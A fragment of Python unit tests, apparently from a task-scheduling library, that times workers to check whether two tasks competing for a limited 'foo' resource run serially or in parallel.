def assert_duration(self, min_duration=0, max_duration=-1):
t0 = time.time()
try:
yield
finally:
duration = time.time() - t0
self.assertGreater(duration, min_duration)
if max_duration > 0:
self.assertLess(duration, max_duration)
def test_tasks_serial(self):
# serial test
# run two tasks that do not reduce the "foo" resource
# as the total foo resource (3) is smaller than the requirement of two tasks (4),
# the scheduler is forced to run them serially which takes longer than 4 seconds
with self.worker() as w:
w.add(ResourceWrapperTask(reduce_foo=False))
with self.assert_duration(min_duration=4):
w.run()
def test_tasks_parallel(self):
# parallel test
# run two tasks and the first one lowers its requirement on the "foo" resource, so that
# the total "foo" resource (3) is sufficient to run both tasks in parallel shortly after
# the first task started, so the entire process should not exceed 4 seconds
with self.worker() as w:
w.add(ResourceWrapperTask(reduce_foo=True))
with self.assert_duration(max_duration=4):
w.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.